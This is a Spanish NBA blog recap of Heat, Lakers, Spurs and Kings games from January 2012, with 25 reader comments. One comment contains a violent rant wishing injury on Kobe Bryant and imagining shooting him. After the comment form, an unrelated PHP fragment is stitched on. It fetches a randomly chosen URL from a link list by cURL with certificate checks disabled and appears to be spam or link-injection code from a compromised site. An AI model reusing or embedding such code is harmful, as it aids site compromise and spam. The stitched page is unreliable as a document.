La Crónica: Miami se crece ante la adversidad

06 de January de 2012 por txusma

La cosa pintaba muy mal para Miami una vez confirmadas las ausencias de Dwyane Wade y Lebron James. Pocos de nosotros apostaríamos un euro a favor de un equipo que pierde a sus 2 principales estrellas y más todavía si se trata de 2 super estrellas como los jugadores de los Heat. Si los Hawks se las prometieron felices al principio del partido pronto comprobaron que aquello no sería un paseo militar. Chris Bosh se puso el mono de trabajo y con la ayuda principalmente de Mario Chalmers (¿picado por todos aquellos que ya le quieren sentar en favor de Norris Cole?) mantuvo a su equipo con vida en ataque a la vez que Miami se aplicaba como nunca en defensa. Un enorme triple de Bosh a falta de 6 centésimas para que acabara el partido llevó el partido a la prórroga y tras 2 periodos adicicionales igualados, en el tercero apareció Chalmers para matar el partido (116-109). La de ayer fue una auténtica exhibición de fuerza de los Heat mucho más convincente que cualquier paliza con su ‘Big Three’ en cancha.

Por su parte, los Lakers cayeron el Rose Garden después de ser superados claramente en el tercer cuarto. Tras un mate espectacular de Gerald Wallace (enorme una vez más) el partido se rompió a favor de los de casa que ya nunca perdió la ventaja (96-107). Los Lakers fallaron los 11 triples que intentaron y se quedaron sin anotar desde más allá de la línea por primera vez desde el 2003. Y cuidado porque la muñeca de Kobe sigue dando serios problemas.

El duelo de viejos rockeros se lo llevaron los Spurs. Dallas, y principalmente Dirk Nowitzki, notó en exceso el hecho de jugar su sexto partido en apenas 8 días y no plantó batalla en ningún momento (71-93). Y los Kings, que habían despedido a Whestpal horas antes del inicio del partido, consiguieron remontar un partido que perdían por 21 puntos en la media parte (100-103).

TOP-5


PREMIOS

MVP: Chris Bosh, sospechoso habitual, se reivindicó manteniendo a los suyos en ausencia de las otras dos patas del ‘Big Three’. 33 ptos, 14 rebotes, 5 asistencias, 2 tapones y 2 robos. Eso sí, utilizó 3 prórrogas y 47 minutos de juego para amasar tal impresionante registro.

Rookie: Podría haber sido el día de Norris Cole, sin embargo ayer quedó eclipsado por su casi inédito compañero Terrel Harris con 9 puntos, 14 rebotes y 4 asistencias. ¿Será posible que encima los Heat hayan tenido suerte con sus elecciones de rookies este año?

La sorpresa: Pues una de las razones por la que no fue la noche de Cole fue por el asombroso partidazo que se marcó Chalmers. 29 ptos, 7 rebotes, 8 asistencias, 3 robos y 1 tapón. ¡Qué bien le ha venido la competencia!

La decepción: Más que demérito personal fue acierto rival. No es frecuente una anotación tan baja de Dirk Nowitzki, únicamente 6 puntos. Los Spurs trabajaron bien para lograrlo y los Mavs van a tener que mejorar mucho hasta parecerse lejanamente a los del año pasado.

El mayor esfuerzo en vano: Brandon Jennings sufrió el impulso de lo de “entrenador nuevo victoria segura” y no pudo evitar la remontada de los nuevos Kings de Smart con sus 31 ptos, 7 asistencias, 5 robos, 3 rebotes en una actuación de MVP.

Comenta

25 comentarios a esta entrada

  1. Denise dice:
    #1

    No le deis más cera a Norris Cole, que su partido no ha debido de ser tan malo (9 ptos, 5 asistencias). En mi opinión, en los 4 partidos que he visto de él, me ha parecido un jugón, un tío con potencial para convertirse en el próximo Rajon Rondo. Y denro de un mes le quitará los minutos y la titularidad a Chalmers con la gorra.
    Y de los rookies me ha parecido de lo mejor, teniendo en cuenta que aún no he visto ni a Irving ni a Thompson, y de Kemba Walker solo he visto el horrible partido que se marcó contra Orlando.
    Pero la verdad es que Cole me ha impactado las 4 veces que lo he visto. Hay un enorme potencial en ese jugador.

      Citar

  2. Sancho88 dice:
    #2

    Thompson le echa pelotas y es muy espectacular, pero no tiene le potencial de Cole. Por cierto, no ha sido su mejor partido ni de lejos, pero deja detalles de crack a cada jugada. Le pasa como a Ricky, la calidad se le va cayendo de los bolsillos. xd. Le ha hecho una picia con malicia al señor Radmanovic que después se ha tenido que ir con Loncar de cubalibres, jeje. No, en serio, Heat favoritos al anillo. Si no lo ganan este año ya no lo ganan, de eso estoy seguro. Hoy Bosh puso el modo Toronto Raptors y demostró que con confianza sigue siendo uno de los cinco mejores ala pívots de la liga. Yo también pensaba que se iban a desangrar estos Heat sin Lebron y Wade, pero nada más lejos de la realidad. Pegamento Battier cumplió, y el escolta este, Jones creo, también lo hizo bastante bien. Tienen ahí una terna de jovenzuelos pacientes en el banquillo que le dan mucha estabilidad a la rotación y tienen muchas ganas de destacar entre tanto crack. Molan muchísimo además de ver este año. Con Chalmers y Cole dando clínics de dirección (quien lo diría en Chalmers), me parece que además de efectivos, este año los Heat son divertidos. Y ya era hora que un equipo aspirante al anillo diera diversión, porque estoy harto de los equipos sobrios con potencial de campeón que se aburren hasta ellos mismos. En resumen, jornadón esta noche. Y ELE A… EN FIN, nada que comentar. Lo más ridículo que he visto en mucho tiempo. El sistema unipersonal en Kobe me ha recordado por momentos a los años estos que estaba Kobe solo con Samaki Walker, Shammond Williams, etc. etc.

      Citar

  3. melo15 dice:
    #3

    Enorme Tyreke Evans 31 puntos 10 rebores 5 asistencias byen partido de Cousins tambien 19/15 pare el
    Los Mavericks como no espavilen…
    Chris bosh vaya partidazo el triple es de estrella

      Citar

  4. Nacho dice:
    #4

    ¡Enhorabuena Melo, hoy no han perdido los Knicks!

      Citar

  5. alejandro89 dice:
    #5

    los kings tienen un equipo muy bueno de futuro si encajan bien,con evans,cousins y fredette son un equipo de futuras estrellas,portland sigue a lo suyo demostrando que en equipo se juega bien a este deporte y lamarcus all start,lo va a tener dificil con love y grifin en la misma conferencia pero esta a un nivel espectacular

      Citar

  6. RSB dice:
    #6

    Ayer vi solo la segunda mitad del Lakers-Portland y no sé que pasó al principio (donde parece ser que Aldridge hizo el agosto), pero la segunda parte me confirmó unas cuantas cosas:

    -Que lo de Bynum no es un flor de unos días, esta muy intenso atrás y moviéndose muy bien en ataque. Un notición, aunque no sé si para Lakers o para Orlando.

    -Que Pau tiene las horas contadas en este equipo. En un partido a cara de perro y siempre por detrás en el marcador jugó “solo” 30 minutos. No estaba McRoberts y Murphy jugó bastante mal, muy blando atrás… Y aún así se pasó casi todo el tercer cuarto en el banquillo. Igual me sorprende porque con el tito Phil Pau jugaba 38 minutos mínimo en este tipo de partidos pero… Significativo. Además no le llegan balones en absoluto. Cada día se juega un tiro o dos menos. A este ritmo, de aquí a unas semanas se tirará solo 7 u 8 tiros. Y porque está con buena racha, el día que no le atine la muñeca se quedará en 4 o 6 puntos tan ricamente y se empezará a hablar de nuevo de problemas mentales. Para Brown Bynum es la segunda espada claramente, y el rol de Pau empieza a ser muy secundario. Huele a traspaso.

    -Que Bryant sigue a lo suyo. Da igual que estén 5 arriba, iguales, o 12 atrás. Cuando quedan menos de 6 minutos de partido empieza el show de Juan Palomo. Hace buenos números porque sigue siendo muy determinante, pero es desesperante verle tirar entre 3 tíos para fallarla o que le roben dos balones en los minutos clave por moverla y requetemoverla…

      Citar

  7. Nacho dice:
    #7

    Sancho88: Y ELE A… EN FIN, nada que comentar. Lo más ridículo que he visto en mucho tiempo. El sistema unipersonal en Kobe me ha recordado por momentos a los años estos que estaba Kobe solo con Samaki Walker, Shammond Williams, etc. etc.

    ¡Hombre, también hacen un poco Bynum sistema! De todas maneras esperable teniendo el entrenador que tienen. Ebanks desaparecido varios días después de ser titular y hoy vuelve cuando Barnes lo está haciendo bien para que éste no salga más. Y esto es solo un ejemplo.
    Hoy no han estado mal en el tiro Kobe y Bynum. Gasol a este paso termina el año con menos puntos pero hará el mejor porcentaje de su carrera, normal, ya que va a tener pocos tiros intentará meterlos todos.
    No pintan nada mal los Blazers, y eso que algunos no dábamos un duro por ellos.
    Los otros partidos no los he visto, pero el triple de Bosh es brutal, vaya manita tiene este chico, y lo digo yo, que lo pongo a caer de un burro cuando puedo. Hoy toca callarse.
    Los Spurs son de los que dan guerra hasta muertos. A ese equipo hay que incinerarle (es LE o LO, ¡dios!, yo que pongo a parir a los de las faltas, estoy en un sinvivir) y aún así yo no me fiaría de ellos.
    ¿Os imagináis a Odom pidiendo un traspaso en breve?

      Citar

  8. melo15 dice:
    #8

    Los knicks han ganado y no lo poneis? Contra los wizards?

      Citar

  9. Sancho88 dice:
    #9

    es le, incinerarle. si pones lo es loísmo, que ultimamente está muy de moda para que no te llamen leísta. pero vamos, me parece mucho más inculto los loístas. Y digo lo de Lakers porque vale que Bynum está siendo el mejor del equipo, y segundo de la conferencia solo por detrás de Love, pero es q lo que decís, en los últimos minutos solo se las tira Kobe, y es asqueroso, repugnante, dan ganas de demandarle por acoso sexual, o algo así, jajaj. Dan ganas de emparentarle con Juanita Jordan, dan ganas de encerrarle en un cuarto oscuro con John Amaechi, dan ganas de que su hijo de parezca a Paquirrín pero en negro, dan ganas de que en una de sus lesiones se quede definitivamente sin muñeca, o sin rodillas, o codo, o que se queden sus dedos torcidos atrapados en la reja de Martynas Pocius. No sé, cuando empieza a tirárselas todas, yo piyaría una escopeta y le volaría la cabeza. Es repugnante. Es decir, él mismo no sabe cuando parar? cuando soltar le pelotita? Y es que además, no son ya los dos o tres puntos que no va a meter, sino que como también comentáis, la mayoría de las veces le roban la pelota porque está to’ lento de viejo que está, y ya no se entera con defensas rápidas. No sé, retomando la pregunta de ayer, a quién odias? A Kobe Bryant

      Citar

  10. Sancho88 dice:
    #10

    melo, tu madre te mete droja en el colacado verdad? dime que es verdad, xfa…

      Citar

  11. busky23 dice:
    #11

    Victoria importantísima de los Heat,de esas que refuerzan y mucho a una plantilla. Chris Bosh ha vuelto a sentirse All-Star,demostrando que ante la baja de 2 Mvp’s el se carga al equipo a la espalda,el triple para llevar el partido a la prorroga es brutal,aunque creo que si lo intenta 10 veces le sale 1.
    Mario Chalmers,otro que ha dicho “aquí estoy yo”,sensacional partido el suyo.

    Los Lakers…más de lo mismo,estoy totalmente de acuerdo con RSB,Pau,a pesar de tener unos grandes porcentajes cada vez parece tener un papel mas secundario en favor de Bynum,traspaso?…ojala.
    El comienzo de la segunda parte ha sido un autentico desastre,Blake ha vuelto a ser el de la temporada pasada fallando triple tras triple,Kobe ha jugado un enorme partido,será Juan Palomo,pero sin él los Lakers serian aun mas desastrosos si cabe.
    Portland es un equipo con los mecanismos perfectamente aprendidos,tanto en defensa como en ataque,Felton es un base perfecto para desarrollar el juego que le gusta a McMillan,Aldridge,enorme una vez mas,Wallace súper intenso,y Crawford ajusticiando y demostrando que este tipo de jugadores consiguen aportar las cosas que hacen falta para cambiar un partido,me gustan y mucho estos Blazers 2001/12.

    Con Whestphal hubieran remontado los Kingston 21 pts de diferencia??? Orden es lo que hace falta en ese equipo.

    Esta noche un interesante Cavaliers vs. Wolves

      Citar

  12. busky23 dice:
    #12

    Victoria importantísima de los Heat,de esas que refuerzan y mucho a una plantilla. Chris Bosh ha vuelto a sentirse All-Star,demostrando que ante la baja de 2 Mvp’s el se carga al equipo a la espalda,el triple para llevar el partido a la prorroga es brutal,aunque creo que si lo intenta 10 veces le sale 1.
    Mario Chalmers,otro que ha dicho “aquí estoy yo”,sensacional partido el suyo.

    Los Lakers…más de lo mismo,estoy totalmente de acuerdo con RSB,Pau,a pesar de tener unos grandes porcentajes cada vez parece tener un papel mas secundario en favor de Bynum,traspaso?…ojala.
    El comienzo de la segunda parte ha sido un autentico desastre,Blake ha vuelto a ser el de la temporada pasada fallando triple tras triple,Kobe ha jugado un enorme partido,será Juan Palomo,pero sin él los Lakers serian aun mas desastrosos si cabe.
    Portland es un equipo con los mecanismos perfectamente aprendidos,tanto en defensa como en ataque,Felton es un base perfecto para desarrollar el juego que le gusta a McMillan,Aldridge,enorme una vez mas,Wallace súper intenso,y Crawford ajusticiando y demostrando que este tipo de jugadores consiguen aportar las cosas que hacen falta para cambiar un partido,me gustan y mucho estos Blazers 2001/12.

    Con Whestphal hubieran remontado los Kingston 21 pts de diferencia??? Orden es lo que hace falta en ese equipo.

    Esta noche un interesante Cavaliers vs. Wolves,Irving vs. Ricky, Melo15 vs. El resto del blog 😉

      Citar

  13. Nacho dice:
    #13

    @Melo, era una coña…
    @Sancho, gracias. Creía que era LE y lo he puesto, pero de repente me atacó el virus del loísmo y de quedar bien y … entran las dudas
    Tradeamos a Pocius por Kobe? Si no lo veta Stern igual quiere “El Ser Supremo”

      Citar

  14. melo15 dice:
    #14

    Os vais a enterar Irving se va a salir, mañana me pidireis todos perdon.
    PD:Sancho calmate.
    Ahora todo el mundo se queja de Kobe con todo lo que os a dado a los lakers, que falsos u que chaqueteros.

      Citar

  15. Sancho88 dice:
    #15

    con todo lo que os “a” dado a los Lakers (ha) será para el que sea de Lakers. Yo soy del enemigo, y de Pau. A mi Lakers particularmente me parecen unos mercenarios estilo Florentino. Yo de pequeño llevaba mi mochila bordada con el señor irlandés de la pipa, y me acompañaba a todos lados, a las excursiones y demás. En España mucha gente se ha hecho de Lakers solo porque está Pau, pero vamos, no creo que sea mayoritario ese sentir, aquí la peña es de Chicago o Boston.

    Irving está siendo el rookie más valorado de la temporada y eso hay que respetarlo, pero a solo una décima de valoración, adivina melo, quien esta? Ricky, y tiembla porque le va a superar en estadísticas y ya no podrás defender a Irving por encima de Ricky. Bueno, sí podrás con tu argumento incontestable de que tiene dos años menos. Con ese argumento creo que tiras hasta final de temporada. Me equivoco?

    Yo estoy calmado, pero me hace gracia lo de Knicks que has puesto, jajaj. y lo de droja y tal, buscalo en el youtube anda…

      Citar

  16. Denise dice:
    #16

    melo15:
    Los knicks han ganado y no lo poneis? Contra los wizards?

    Eres un crack. Sin palabras.

      Citar

  17. Denise dice:
    #17

    melo15:

    Ahora todo el mundo se queja de Kobe con todo lo que os a dado a los lakers, que falsos u que chaqueteros.

    ¿Es obligatorio ser de los Lakers?? ¿Es ésto un club de fans de los Lakers?

      Citar

  18. RSB dice:
    #18

    Bueno yo tampoco soy de los Lakers. No soy de nadie de hecho, el único equipo del que era, eran los añejos Sonics y lo demolieron… Aunque si juega en español pues me veo a ese equipo y espero que ganen. Kobe tiene ya una edad, tiene ya sus ansiados MVP de regular y de las finales, alejó la sombra de Shaq, ya ha conseguido individualmente todo lo que tenía que conseguir… Va siendo la hora de que acepte su edad, y de que acepte que si Bynum se está comiendo a los 5 rivales, pues coño, métele un baloncito de vez en cuando aunque queden 4 minutos, que es bastante más rpobable que la enchufe él que tu ante 3… Hay jugadores que se van haciendo más generosos conforme pasan los años y menos individualistas, a Kobe le pasa al contrario

      Citar

  19. Ru dice:
    #19

    Por cierto,ya se puede votar para el All Star,¿habéis votado ya?A mí el cuerpo me ha pedido pasar de Pau o Marc pero me he regocijado al meter a Ricky,porque creo que hasta ahora se lo merece -y dudé con Lowry que hasta ahora CP3 ni Westbrook me “laten”-.

    Mis votaciones:

    OESTE: Ricky-Kobe-Aldridge-Love-Bynum
    ESTE: Rondo-Rose-Deng-LeBron-Howard

    PD.mirándolo ahora quizás tenía que haber premiado a Durant en lugar de Kobe,que dos de los Lakers es excesivo…

      Citar

  20. melo15 dice:
    #20

    Bueno Sancho ya veremos que pasa en el partido de hoy, y si lo hace mejor Ricky os pedire disculpas.
    Aver que tal les va a los Celtics esta temporada, ojo que no caigan en primera ronda, ademas os lo veo chungo, porque a Garnett y a Allen les quedan un año o dos.

      Citar

  21. German dice:
    #21

    Vi todo el Hawks-Heat. Para mi pecan de inocentes los Hawks, en la ultima posesion donde Bosh anota el triple, tendrian que haber dado una falta, ya que Miami no tenia mas time-outs y tendrian que reponer en su aro con escasos segundos en juego. Encima fallaron 15 tiros libres en el tiempo regular.
    Cole no tuvo su mejor partido pero hizo un par de penetraciones a puro talento. Vi por primera vez a Teague esta temporada y sin dudas ha mejorado aunque todavia le falta.
    Despues vi los ultimos minutos de la remontada de Sacramento. Es la tercera vez en el año que veo parte de un partido de los Bucks y creo no haber visto anotar ni un solo tiro a Stephen Jackson! Ayer en la ultima posesion lanzo de espaldas con dos marcas encima cuando aun habia tiempo… un desastre.
    Que bueno es ver a Evans otra vez en buen nivel.

      Citar

  22. Txusma dice:
    #22

    Creo que no hemos atizado tanto a Cole, simplemente he querido reivindicar un poco la figura de Chalmers. De hecho, le paso un poco como a Cole: Llegó de tapado y sorprendió a todos.

      Citar

  23. Sancho88 dice:
    #23

    Ahora mismo, Chalmers es mejor que Norris Cole. Solo que le ha venido bien el chaval para ponerse las pilas

      Citar

  24. Pop dice:
    #24

    melo15: Bueno Sancho ya veremos que pasa en el partido de hoy, y si lo hace mejor Ricky os pedire disculpas.Aver que tal les va a los Celtics esta temporada, ojo que no caigan en primera ronda, ademas os lo veo chungo, porque a Garnett y a Allen les quedan un año o dos.

    Si Ricky lo hace mejor que Irving no tienes que pedir disculpas a nadie, Melo. Es tu opinión y nadie tiene que sentirse ofendido porque la defiendas, faltaría más.

      Citar

  25. Sancho88 dice:
    #25

    Totalmente de acuerdo con Pop. De hecho, yo valoro tu vena dura de analista por encima de todo. Además, es de lo que se trata, que cada uno exprese su opinión. De ahí salen los debates tan geniales que nos salen. Hay dos formas de ver el basket, desde el punto de vista numérico o estadístico y desde el punto de vista romántico. A mi me gusta más el segundo punto de vista, tan respetable como el primero, lógicamente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>